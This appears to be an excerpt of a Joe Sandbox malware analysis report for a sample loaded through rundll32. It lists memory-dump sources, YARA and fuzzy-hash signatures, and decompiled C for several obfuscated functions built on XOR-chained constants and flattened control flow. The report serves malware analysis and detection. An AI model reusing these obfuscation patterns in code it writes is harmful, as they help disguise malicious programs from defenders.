                                                                      0x01ffbcd7
                                                                      0x01ffbcdc
                                                                      0x01ffbce4
                                                                      0x01ffbcec
                                                                      0x01ffbcf9
                                                                      0x01ffbcfd
                                                                      0x01ffbd05
                                                                      0x01ffbd0d
                                                                      0x01ffbd15
                                                                      0x01ffbd1d
                                                                      0x01ffbd25
                                                                      0x01ffbd25
                                                                      0x01ffbd2f
                                                                      0x01ffbd5b
                                                                      0x01ffbd60
                                                                      0x01ffbd63
                                                                      0x00000000
                                                                      0x01ffbd31
                                                                      0x01ffbd37
                                                                      0x01ffbdbd
                                                                      0x01ffbdbf
                                                                      0x01ffbd39
                                                                      0x01ffbd3f
                                                                      0x00000000
                                                                      0x01ffbd41
                                                                      0x01ffbd41
                                                                      0x00000000
                                                                      0x01ffbd41
                                                                      0x01ffbd3f
                                                                      0x01ffbd37
                                                                      0x01ffbdc3
                                                                      0x01ffbdcb
                                                                      0x01ffbdcb
                                                                      0x01ffbd80
                                                                      0x01ffbd85
                                                                      0x01ffbd88
                                                                      0x01ffbd8a
                                                                      0x01ffbd93
                                                                      0x00000000
                                                                      0x01ffbd8c
                                                                      0x01ffbd8c
                                                                      0x00000000
                                                                      0x01ffbd8c
                                                                      0x00000000
                                                                      0x01ffbd98
                                                                      0x01ffbd98
                                                                      0x01ffbd98
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &Y$kN$r$$~]4$~]4
                                                                      • API String ID: 0-4213572440
                                                                      • Opcode ID: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
                                                                      • Instruction ID: 639556a9901f149ea7cc918df2f1efe9d3ebe5e57fb28a652162722d22fcc718
                                                                      • Opcode Fuzzy Hash: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
                                                                      • Instruction Fuzzy Hash: C0514571508341AFE358CF25C89982FBBE1FFD4B58F404A1EF685562A0D3B6CA498B43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023B10A, Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &Y$kN$r$$~]4$~]4
                                                                      • API String ID: 0-4213572440
                                                                      • Opcode ID: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
                                                                      • Instruction ID: e4834b1cd83636764c6e21c74fb977922df87a78caf8a6d750f700b7aabd8388
                                                                      • Opcode Fuzzy Hash: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
                                                                      • Instruction Fuzzy Hash: 5E5166B15183019FE759CF21C98982FBBE1FBC4B58F404A1EF689562A0D3B5CA59CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02001F88, Relevance: 6.4, Strings: 5, Instructions: 123COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E02001F88() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				char* _t108;
				void* _t113;
				signed int _t116;
				signed int _t127;
				short* _t128;
				signed int* _t131;

				_t131 =  &_v560;
				_v532 = 0xdf77;
				_v532 = _v532 | 0xf1b1db65;
				_t113 = 0x2283ac23;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x03c6ff13;
				_v544 = 0xdd97;
				_v544 = _v544 >> 0xb;
				_v544 = _v544 ^ 0x7831024e;
				_v544 = _v544 ^ 0x78315e83;
				_v536 = 0xeb3d;
				_v536 = _v536 << 4;
				_v536 = _v536 ^ 0x56aecc65;
				_v536 = _v536 ^ 0x56a04d5b;
				_v524 = 0x8c08;
				_v524 = _v524 | 0x5902e3b1;
				_v524 = _v524 ^ 0x5902aa3b;
				_v552 = 0xfdc1;
				_v552 = _v552 * 0x29;
				_t127 = 0x1d;
				_v552 = _v552 * 0x66;
				_v552 = _v552 / _t127;
				_v552 = _v552 ^ 0x008eebdb;
				_v556 = 0x4ae2;
				_v556 = _v556 + 0xffff2c78;
				_v556 = _v556 + 0xdee6;
				_v556 = _v556 >> 0x10;
				_v556 = _v556 ^ 0x000006e5;
				_v528 = 0xfda8;
				_v528 = _v528 << 0xf;
				_v528 = _v528 ^ 0x7ed4787e;
				_v540 = 0xbfac;
				_v540 = _v540 >> 7;
				_t128 = _v528;
				_v540 = _v540 * 0x19;
				_v540 = _v540 ^ 0x00004b65;
				_v560 = 0xd500;
				_v560 = _v560 * 0x6a;
				_v560 = _v560 >> 3;
				_v560 = _v560 + 0x9ecd;
				_v560 = _v560 ^ 0x000bcd88;
				L1:
				while(_t113 != 0xb1bd1f2) {
					if(_t113 == 0x109d50bf) {
						_push(_t113);
						_t108 = E01FFDFD8(_v532,  &_v520, __eflags, _v544, _v536);
						_t131 =  &(_t131[3]);
						_t113 = 0x26f0d27d;
						continue;
					} else {
						if(_t113 == 0x2283ac23) {
							_t113 = 0x109d50bf;
							continue;
						} else {
							if(_t113 == 0x26f0d27d) {
								_v548 = 0x7bf9;
								_t116 = 0x44;
								_v548 = _v548 / _t116;
								_v548 = _v548 << 0xb;
								_v548 = _v548 ^ 0x000e9002;
								_t128 =  &_v520 + E0200232B(_v524,  &_v520, _v552) * 2;
								while(1) {
									_t108 =  &_v520;
									if(_t128 <= _t108) {
										break;
									}
									__eflags =  *_t128 - 0x5c;
									if( *_t128 != 0x5c) {
										L8:
										_t128 = _t128 - 2;
										__eflags = _t128;
										continue;
									} else {
										_t88 =  &_v548;
										 *_t88 = _v548 - 1;
										__eflags =  *_t88;
										if( *_t88 == 0) {
											__eflags = _t128;
										} else {
											goto L8;
										}
									}
									L12:
									_t113 = 0xb1bd1f2;
									goto L1;
								}
								goto L12;
							}
						}
					}
					L16:
					__eflags = _t113 - 0x20ed6828;
					if(__eflags != 0) {
						continue;
					}
					return _t108;
				}
				__eflags =  *0x2011088 + 0x38;
				E020003F1(_v556, _v528, _t128,  *0x2011088 + 0x38, _v540, _v560);
				_t131 =  &(_t131[4]);
				_t113 = 0x20ed6828;
				goto L16;
			}




















                                                                      0x02001f88
                                                                      0x02001f8e
                                                                      0x02001f98
                                                                      0x02001fa0
                                                                      0x02001fa5
                                                                      0x02001faa
                                                                      0x02001fb2
                                                                      0x02001fba
                                                                      0x02001fbf
                                                                      0x02001fc7
                                                                      0x02001fcf
                                                                      0x02001fd7
                                                                      0x02001fdc
                                                                      0x02001fe4
                                                                      0x02001fec
                                                                      0x02001ff4
                                                                      0x02001ffc
                                                                      0x02002004
                                                                      0x02002015
                                                                      0x0200202a
                                                                      0x02002030
                                                                      0x0200203a
                                                                      0x0200203e
                                                                      0x02002046
                                                                      0x0200204e
                                                                      0x02002056
                                                                      0x0200205e
                                                                      0x02002063
                                                                      0x0200206b
                                                                      0x02002073
                                                                      0x02002078
                                                                      0x02002080
                                                                      0x02002088
                                                                      0x02002092
                                                                      0x02002096
                                                                      0x0200209a
                                                                      0x020020a2
                                                                      0x020020af
                                                                      0x020020b3
                                                                      0x020020b8
                                                                      0x020020c0
                                                                      0x00000000
                                                                      0x020020c8
                                                                      0x020020d2
                                                                      0x02002147
                                                                      0x02002158
                                                                      0x0200215d
                                                                      0x02002160
                                                                      0x00000000
                                                                      0x020020d4
                                                                      0x020020da
                                                                      0x02002143
                                                                      0x00000000
                                                                      0x020020dc
                                                                      0x020020de
                                                                      0x020020e4
                                                                      0x020020f4
                                                                      0x020020fb
                                                                      0x020020ff
                                                                      0x02002104
                                                                      0x0200211e
                                                                      0x02002132
                                                                      0x02002132
                                                                      0x02002138
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02002123
                                                                      0x02002127
                                                                      0x0200212f
                                                                      0x0200212f
                                                                      0x0200212f
                                                                      0x00000000
                                                                      0x02002129
                                                                      0x02002129
                                                                      0x02002129
                                                                      0x02002129
                                                                      0x0200212d
                                                                      0x0200213c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200212d
                                                                      0x0200213f
                                                                      0x0200213f
                                                                      0x00000000
                                                                      0x0200213f
                                                                      0x00000000
                                                                      0x0200213a
                                                                      0x020020de
                                                                      0x020020da
                                                                      0x0200218e
                                                                      0x0200218e
                                                                      0x02002194
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020021a4
                                                                      0x020021a4
                                                                      0x02002178
                                                                      0x02002181
                                                                      0x02002186
                                                                      0x02002189
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (h $(h $=$eK$J
                                                                      • API String ID: 0-3161474748
                                                                      • Opcode ID: 4d2485bd24f02287eff72440a9d10f9311ca1f01650303c177082e87438b2de7
                                                                      • Instruction ID: ed612ba61d223b9070b3e89970f8c391a3829570f2cd19e950bed9253d116210
                                                                      • Opcode Fuzzy Hash: 4d2485bd24f02287eff72440a9d10f9311ca1f01650303c177082e87438b2de7
                                                                      • Instruction Fuzzy Hash: 495152B15083428FE759CF24C88941FBBE1FBE4748F504D1EF596962A0D3B48A4ADB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002414FC, Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (h $(h $=$eK$J
                                                                      • API String ID: 0-3161474748
                                                                      • Opcode ID: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
                                                                      • Instruction ID: bfb949fa54a2e2b2a8f81b97a21acd8fcfd924a2720da206292756a4ead6db52
                                                                      • Opcode Fuzzy Hash: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
                                                                      • Instruction Fuzzy Hash: 605165B15183428BD758CF25C88941FBBE5FBD4748F144D1EF492962A0D3B0CAAACF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFA2D2, Relevance: 6.4, Strings: 5, Instructions: 121COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E01FFA2D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t121;
				void* _t124;
				signed int* _t126;

				_t126 =  &_v36;
				_v32 = 0x28a4;
				_t110 = 0x7a;
				_v32 = _v32 / _t110;
				_v32 = _v32 + 0x1ce1;
				_t124 = 0x1fa14ba;
				_t111 = 0x6a;
				_v32 = _v32 * 0x39;
				_v32 = _v32 ^ 0x0006d499;
				_v36 = 0xda62;
				_v36 = _v36 | 0x19bfccda;
				_v36 = _v36 * 0x11;
				_v36 = _v36 + 0xffffda64;
				_v36 = _v36 ^ 0xb5bd9561;
				_v16 = 0xf5e2;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xb4169af8;
				_v16 = _v16 ^ 0xb7c16fee;
				_v8 = 0x3ff4;
				_v8 = _v8 + 0xed72;
				_v8 = _v8 ^ 0x000177ac;
				_v20 = 0x623c;
				_v20 = _v20 * 0x56;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0010aba0;
				_v4 = 0xa056;
				_v4 = _v4 + 0x9c16;
				_v4 = _v4 ^ 0x00012145;
				_v12 = 0xa565;
				_v12 = _v12 / _t111;
				_v12 = _v12 + 0xb62d;
				_v12 = _v12 ^ 0x0000fb40;
				_v24 = 0x4678;
				_v24 = _v24 + 0x5e74;
				_v24 = _v24 ^ 0x342f7ead;
				_v24 = _v24 | 0x89ec9c0a;
				_v24 = _v24 ^ 0xbdefbaa2;
				_v28 = 0x6d4f;
				_v28 = _v28 + 0xbb4f;
				_v28 = _v28 ^ 0x81aeaea9;
				_t100 = _v28;
				_t112 = 0x2b;
				_t121 = _t100 % _t112;
				_v28 = _t100 / _t112;
				_v28 = _v28 ^ 0x03044831;
				_t113 =  *0x2011090;
				do {
					while(_t124 != 0x1fa14ba) {
						if(_t124 == 0x9354c13) {
							_push(_t113);
							_t105 = E01FFA1FE(_t113, _t121, _v16, _t113, _v8, _v20);
							_t113 =  *0x2011090;
							_t126 =  &(_t126[5]);
							_t124 = 0x2ac5a631;
							 *((intOrPtr*)(_t113 + 0x1c)) = _t105;
							continue;
						} else {
							if(_t124 != 0x2ac5a631) {
								goto L10;
							} else {
								_push(E02008C2B);
								_push(_v28);
								_push(_t113);
								_push(_v24);
								_push(_v12);
								_t106 = E01FF903E(0, _v4);
								_t113 =  *0x2011090;
								 *((intOrPtr*)(_t113 + 0x18)) = _t106;
							}
						}
						L5:
						return 0 | _t113 != 0x00000000;
					}
					_push(_t113);
					_t121 = 0x2c;
					_t113 = E01FF54FB(_t121);
					 *0x2011090 = _t113;
					if(_t113 == 0) {
						_t124 = 0x380d3f8a;
						goto L10;
					} else {
						_t124 = 0x9354c13;
						continue;
					}
					goto L5;
					L10:
				} while (_t124 != 0x380d3f8a);
				goto L5;
			}






















                                                                      0x01ffa2d2
                                                                      0x01ffa2d5
                                                                      0x01ffa2e9
                                                                      0x01ffa2ee
                                                                      0x01ffa2f4
                                                                      0x01ffa2fc
                                                                      0x01ffa30b
                                                                      0x01ffa318
                                                                      0x01ffa31c
                                                                      0x01ffa324
                                                                      0x01ffa32c
                                                                      0x01ffa339
                                                                      0x01ffa33d
                                                                      0x01ffa345
                                                                      0x01ffa34d
                                                                      0x01ffa355
                                                                      0x01ffa35a
                                                                      0x01ffa362
                                                                      0x01ffa36a
                                                                      0x01ffa372
                                                                      0x01ffa37a
                                                                      0x01ffa382
                                                                      0x01ffa38f
                                                                      0x01ffa393
                                                                      0x01ffa397
                                                                      0x01ffa39f
                                                                      0x01ffa3a7
                                                                      0x01ffa3af
                                                                      0x01ffa3b7
                                                                      0x01ffa3c7
                                                                      0x01ffa3cb
                                                                      0x01ffa3d3
                                                                      0x01ffa3db
                                                                      0x01ffa3e3
                                                                      0x01ffa3eb
                                                                      0x01ffa3f3
                                                                      0x01ffa3fb
                                                                      0x01ffa403
                                                                      0x01ffa40b
                                                                      0x01ffa413
                                                                      0x01ffa41b
                                                                      0x01ffa41f
                                                                      0x01ffa420
                                                                      0x01ffa422
                                                                      0x01ffa426
                                                                      0x01ffa42e
                                                                      0x01ffa434
                                                                      0x01ffa434
                                                                      0x01ffa43e
                                                                      0x01ffa483
                                                                      0x01ffa491
                                                                      0x01ffa496
                                                                      0x01ffa49c
                                                                      0x01ffa49f
                                                                      0x01ffa4a1
                                                                      0x00000000
                                                                      0x01ffa440
                                                                      0x01ffa442
                                                                      0x00000000
                                                                      0x01ffa448
                                                                      0x01ffa448
                                                                      0x01ffa450
                                                                      0x01ffa454
                                                                      0x01ffa455
                                                                      0x01ffa45b
                                                                      0x01ffa463
                                                                      0x01ffa468
                                                                      0x01ffa471
                                                                      0x01ffa471
                                                                      0x01ffa442
                                                                      0x01ffa475
                                                                      0x01ffa482
                                                                      0x01ffa482
                                                                      0x01ffa4ae
                                                                      0x01ffa4b1
                                                                      0x01ffa4b8
                                                                      0x01ffa4ba
                                                                      0x01ffa4c2
                                                                      0x01ffa4cb
                                                                      0x00000000
                                                                      0x01ffa4c4
                                                                      0x01ffa4c4
                                                                      0x00000000
                                                                      0x01ffa4c4
                                                                      0x00000000
                                                                      0x01ffa4cd
                                                                      0x01ffa4cd
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <b$Om$ed by default$r$t^
                                                                      • API String ID: 0-2037609653
                                                                      • Opcode ID: 70b655cd691629c0b6c7952b4666e3ba328f052b5338c20401b5ee6762262cf4
                                                                      • Instruction ID: 5245ce593cc3e8e5e570ad5d784fd3b3fdf1ae4e22336b4cebbf8db0d99c1a74
                                                                      • Opcode Fuzzy Hash: 70b655cd691629c0b6c7952b4666e3ba328f052b5338c20401b5ee6762262cf4
                                                                      • Instruction Fuzzy Hash: E45167B19093019FE308DF25D58981BBBE1FFC4718F404A1DF589A71A1D3BACA598F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00239846, Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <b$Om$ed by default$r$t^
                                                                      • API String ID: 0-2037609653
                                                                      • Opcode ID: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
                                                                      • Instruction ID: 11581cc4fb9fb238f793d458acc9caec631f21f0697394d8ee6571a9938d8c5a
                                                                      • Opcode Fuzzy Hash: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
                                                                      • Instruction Fuzzy Hash: 3551BCB15183019FE308DF25C58A81BBBE1FBD5718F500A1DF489661A0D3B9CE998F87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02008A33, Relevance: 6.4, Strings: 5, Instructions: 110COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E02008A33(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t116;
				signed int _t118;
				int _t123;
				void* _t126;
				signed int _t127;
				signed int _t129;
				signed int _t134;
				void* _t145;
				void* _t149;
				signed int _t151;

				_v48 = 0xf279;
				_v48 = _v48 | 0xff7f3bd7;
				_v48 = _v48 + 0xffffb664;
				_v48 = _v48 ^ 0xff7fb26b;
				_v52 = 0xdfc5;
				_v52 = _v52 | 0x672e76b1;
				_v52 = _v52 >> 6;
				_v52 = _v52 << 0xe;
				_v52 = _v52 ^ 0x2effc010;
				_v28 = 0x717b;
				_t149 = __ecx;
				_v28 = _v28 * 0x13;
				_t129 = 0x2b;
				_v28 = _v28 * 0x77;
				_v28 = _v28 ^ 0x03ea435f;
				_v16 = 0x5e90;
				_v16 = _v16 + 0x8fca;
				_v16 = _v16 ^ 0x0000ee4a;
				_v20 = 0x9c59;
				_v20 = _v20 ^ 0x54a83331;
				_v20 = _v20 ^ 0x54a8d08f;
				_v36 = 0x2be7;
				_v36 = _v36 | 0xf6bdff7f;
				_v36 = _v36 ^ 0xf6bda7e3;
				_v32 = 0x6479;
				_v32 = _v32 << 6;
				_v32 = _v32 * 0x13;
				_v32 = _v32 ^ 0x01dd2cd3;
				_v40 = 0x51fb;
				_v40 = _v40 + 0x7aab;
				_v40 = _v40 + 0xd6ea;
				_v40 = _v40 + 0xc8ce;
				_v40 = _v40 ^ 0x000230c3;
				_v8 = 0x432;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x000148ae;
				_v24 = 0xb7c8;
				_v24 = _v24 * 0x18;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x9d6067a0;
				_v12 = 0x7924;
				_t59 =  &_v12; // 0x7924
				_v12 =  *_t59 / _t129;
				_v12 = _v12 ^ 0x0000718b;
				_v44 = 0x1703;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x24440fa6;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x91103eb4;
				_v4 = E01FFA156();
				_t126 = _v48 + E01FFA156() % _v52;
				_t116 = E01FFA156();
				_t118 = _v44;
				_t151 = _v28 + _t116 % _v16;
				if(_t118 < _t126) {
					_t127 = _t126 - _t118;
					_t145 = _t149;
					_t134 = _t127 >> 1;
					_t123 = memset(_t145, 0x2d002d, _t134 << 2);
					asm("adc ecx, ecx");
					_t149 = _t149 + _t127 * 2;
					memset(_t145 + _t134, _t123, 0);
				}
				E0200087B(_t149, _v40, _v8, _t151, _v24, 3,  &_v4, _v12);
				 *((short*)(_t149 + _t151 * 2)) = 0;
				return 0;
			}


























                                                                      0x02008a36
                                                                      0x02008a40
                                                                      0x02008a48
                                                                      0x02008a50
                                                                      0x02008a58
                                                                      0x02008a5f
                                                                      0x02008a66
                                                                      0x02008a6a
                                                                      0x02008a6e
                                                                      0x02008a75
                                                                      0x02008a85
                                                                      0x02008a87
                                                                      0x02008a92
                                                                      0x02008a93
                                                                      0x02008a97
                                                                      0x02008a9f
                                                                      0x02008aa7
                                                                      0x02008aaf
                                                                      0x02008ab7
                                                                      0x02008abf
                                                                      0x02008ac7
                                                                      0x02008acf
                                                                      0x02008ad7
                                                                      0x02008adf
                                                                      0x02008ae7
                                                                      0x02008aef
                                                                      0x02008af9
                                                                      0x02008afd
                                                                      0x02008b05
                                                                      0x02008b0d
                                                                      0x02008b15
                                                                      0x02008b1d
                                                                      0x02008b25
                                                                      0x02008b2d
                                                                      0x02008b3a
                                                                      0x02008b3e
                                                                      0x02008b46
                                                                      0x02008b53
                                                                      0x02008b57
                                                                      0x02008b5c
                                                                      0x02008b64
                                                                      0x02008b6c
                                                                      0x02008b72
                                                                      0x02008b76
                                                                      0x02008b7e
                                                                      0x02008b86
                                                                      0x02008b8b
                                                                      0x02008b93
                                                                      0x02008b98
                                                                      0x02008ba9
                                                                      0x02008bc6
                                                                      0x02008bc8
                                                                      0x02008bd9
                                                                      0x02008bdd
                                                                      0x02008be1
                                                                      0x02008be3
                                                                      0x02008bed
                                                                      0x02008bef
                                                                      0x02008bf1
                                                                      0x02008bf3
                                                                      0x02008bf5
                                                                      0x02008bf8
                                                                      0x02008bfb
                                                                      0x02008c16
                                                                      0x02008c20
                                                                      0x02008c2a

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $yJ$J$yd${q$+
                                                                      • API String ID: 0-1056812311
                                                                      • Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction ID: 4d377557e5ccc289689a5ba032741cc34416f7915d9cf1ceba3576c290483e89
                                                                      • Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction Fuzzy Hash: 6851017050D341AFD348DF24D98941BFBE1BBC8B48F50991DF0DA962A0C3B59A59CF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00247FA7, Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $yJ$J$yd${q$+
                                                                      • API String ID: 0-1056812311
                                                                      • Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction ID: 7d308a0948d164d9816890152242fc119d2201f841fc781d7653d5a199b9902a
                                                                      • Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction Fuzzy Hash: AD51F1B050D341ABD348DF25D98941BFBE1FBC8B48F50991DF0CA962A1C3B49A59CF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFFFBA, Relevance: 6.4, Strings: 5, Instructions: 103COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E01FFFFBA(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v588;
				void* _t119;
				signed int _t127;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0x26646a;
				_v36 = 0x19d7;
				_v36 = _v36 ^ 0x575cc756;
				_v36 = _v36 ^ 0x575cd0df;
				_v12 = 0x27d2;
				_t127 = 0x61;
				_v12 = _v12 / _t127;
				_v12 = _v12 ^ 0x9e7a6cb1;
				_v12 = _v12 + 0x91e2;
				_v12 = _v12 ^ 0x9e7ab2a5;
				_v24 = 0x1208;
				_v24 = _v24 << 8;
				_v24 = _v24 + 0xff06;
				_v24 = _v24 ^ 0x00133f87;
				_v56 = 0x4c40;
				_v56 = _v56 + 0xffffbb62;
				_v56 = _v56 ^ 0x00002706;
				_v44 = 0x6bda;
				_v44 = _v44 | 0x742987e1;
				_v44 = _v44 ^ 0x7429f52a;
				_v28 = 0x57ee;
				_v28 = _v28 >> 1;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x00003c46;
				_v52 = 0x4743;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 ^ 0x00003729;
				_v16 = 0xad1b;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 | 0xb72f12c0;
				_v16 = _v16 ^ 0xb72f244f;
				_v32 = 0x1354;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00006891;
				_v20 = 0xf00c;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 << 0xa;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x00003ff0;
				_v8 = 0xa5dc;
				_v8 = _v8 ^ 0x3adce6d7;
				_v8 = _v8 | 0x37424e68;
				_t83 =  &_v8; // 0x37424e68
				_v8 =  *_t83 * 0x24;
				_v8 = _v8 ^ 0xfb433705;
				_v48 = 0xf651;
				_v48 = _v48 << 0xf;
				_v48 = _v48 ^ 0x7b288bd6;
				_v40 = 0xf298;
				_v40 = _v40 * 0x22;
				_v40 = _v40 ^ 0x002053ff;
				_t119 = E01FFBDCC( *0x2011088 + 0x38, _v36, _v12, _v24);
				_t140 = _a4 + 0x2c;
				if(E01FF7F4B(_t119, _v56, _a4 + 0x2c, _v44, _v28) != 0) {
					E01FF35FC(_t140, _v52, _v16, _v32,  &_v588, _v20, _a8);
					E01FFEB1E(_v8, _v48, _v40,  &_v588);
				}
				return 1;
			}






















                                                                      0x01ffffc3
                                                                      0x01ffffc9
                                                                      0x01ffffcd
                                                                      0x01ffffd4
                                                                      0x01ffffdb
                                                                      0x01ffffe2
                                                                      0x01ffffe9
                                                                      0x01fffff6
                                                                      0x01fffff9
                                                                      0x01fffffc
                                                                      0x02000003
                                                                      0x0200000a
                                                                      0x02000011
                                                                      0x02000018
                                                                      0x0200001c
                                                                      0x02000023
                                                                      0x0200002a
                                                                      0x02000031
